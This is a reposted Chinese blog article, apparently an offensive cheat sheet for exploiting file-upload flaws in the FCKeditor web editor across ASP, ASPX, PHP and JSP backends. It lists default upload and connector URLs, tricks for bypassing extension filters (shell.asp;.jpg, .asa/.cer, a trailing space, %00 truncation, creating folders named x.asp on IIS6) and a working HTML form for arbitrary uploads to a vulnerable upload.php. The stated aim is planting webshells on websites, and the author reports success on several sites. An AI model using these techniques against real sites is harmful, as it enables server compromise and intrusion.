碼上快樂

相關內容    簡體    繁體

FCKeditor編輯器漏洞

本文轉載自   查看原文   2019-04-07 20:59   602 

目錄

FCKeditor

asp網頁

aspx網頁

php網頁

jsp網頁 

FCKeditor

FCKeditor是一個功能強大支持所見即所得功能的文本編輯器,可以為用戶提供微軟office軟件一樣的在線文檔編輯服務。它不需要安裝任何形式的客戶端,兼容絕大多數主流瀏覽器,支持ASP.Net、ASP、ColdFusion 、PHP、Java、Active-FoxPro、Lasso、Perl、python 等編程環境。

查看編輯器版本:

/fckeditor/editor/dialog/fck_about.html
/FCKeditor/_whatsnew.html

一些FCK默認鏈接(以asp為例):

上傳測試頁面:Fckeditor編輯器默認會存在test.html和uploadtest.html文件,直接訪問這些文件可以獲取當前文件夾文件名稱以及上傳文件,有的版本可以直接上傳任意文件類型,測試上傳地址有:
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html

示例頁面:
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp

連接器:
FCKeditor/editor/filemanager/connectors/asp/connector.asp
FCKeditor/editor/filemanager/connectors/aspx/connector.aspx

創建文件夾鏈接:
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=test

上傳頁面:
Fckeditor/editor/filemanager/browser/default/browser.html?Type=file&Connector=connectors/asp/connector.Asp
Fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=/&Connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/asp/connector.asp

有時候,網站管理員會把上傳頁面禁止創建文件夾和上傳文件,但是由於網站管理員的配置不當,我們的連接器寫絕對路徑的話,有時候可以創建文件夾和上傳文件
Fckeditor/editor/filemanager/browser/default/browser.html?Type=file&Connector=http://ww.xxx.com/connectors/asp/connector.Asp
Fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://ww.xxx.com/connectors/asp/connector.asp
Fckeditor/editor/filemanager/browser/default/browser.html?Type=Flash&Connector=http://ww.xxx.com/connectors/asp/connector.asp

FCKeditor 文件上傳“.”變“_”下划線的繞過方法

很多時候上傳的文件例如: 或shell.asp;.jpg 會變為shell_asp;.jpg 這是新版FCK 的變化。

  • 繼續上傳同名文件可變為shell.php;(1).jpg ,但是新版Fckeditor也修復了這個漏洞。

如果服務器有解析漏洞的話,可以創建文件夾來突破

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/xx.asp&NewFolderName=x.asp

asp網頁

asp一般是搭在Windows Server主機上,Web Server版本一般為 IIS6 / IIS7 / IIS7.5。據我現在所知,asp版的fckeditor已經可以全秒了。

< 2.4.x 版本的File參數時為黑名單驗證,可以通過上傳.asa、.cer、.asp;jpg(針對IIS6)。如果asa、cer不被解析,還可以傳.asp[空格]。傳的方法就是抓包然后在數據包里的文件名后填個空格。

對於 2.5.x 和 2.6.x  版本,如果是IIS6.0 ,可以通過突破變”.”為”_”限制創建.asp文件夾,代碼如下:

Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp

復制代碼然后往這個文件夾里傳 jpg ,這個不多說了。

如果是IIS7及以上,這種方法就gg了。這個時候可以借助剛爆出來的那種方法,先傳shell.asp%00txt,然后再傳一次。

至此,asp版本已經全秒了。

aspx網頁

低版本同ASP版,2.6.x用剛爆出來的二次上傳已經不好使了,不過新建test.asp的文件夾還可以使。一般IIS6.0會支持asp,可以先傳個asp上去,然后再XX。

php網頁

1:低版本(2.4.x及以下),仍然為黑名單驗證,windows主機可以使用php[空格]傳,2.4.3的有個media未設置導致任意文件上傳可以秒linux。

2:2.5.x以后是白名單驗證,僅能寄希望於wooyun里爆的那個<2.6.4的任意文件上傳,成功率有限。

3:2.6.4以上的php版,據我所知沒戲,求高人指點!我粗略的看了一下它的驗證邏輯,表示沒戲,windows里的敏感字符全給過濾了。

4:當FCKeditor 版本 <=2.4.2的php網頁在處理PHP 上傳的地方並未對Media 類型進行上傳文件類型的控制,導致用戶上傳任意文件!將以下保存為html文件,修改action地址為存在漏洞網頁的鏈接。

<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

jsp網頁 

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F

上傳馬所在目錄

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

上傳shell的地址

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector

跟版本有關系.並不是百分百成功. 測試成功幾個站.
不能通殺.很遺憾.

http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector

如果以上地址不行可以試試

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
FCKeditor/_samples/
FCKeditor/_samples/default.html
FCKeditor/editor/fckeditor.htm
FCKeditor/editor/fckdialog.html

轉載文章:https://blog.csdn.net/wizardforcel/article/details/50695885

                 https://blog.csdn.net/lizhengnanhua/article/details/38451737


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 eWebEditor編輯器漏洞利用 7. 編輯器漏洞整理 Fckeditor漏洞利用總結 SQL編輯器 文本編輯器Vim/Neovim任意代碼執行漏洞(CVE-2019-12735) UEditor編輯器兩個版本任意文件上傳漏洞分析 個人向word文檔編輯器(一) Github基於Web的編輯器 LaTex 編輯器知多少 Unity - 編輯器擴展
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM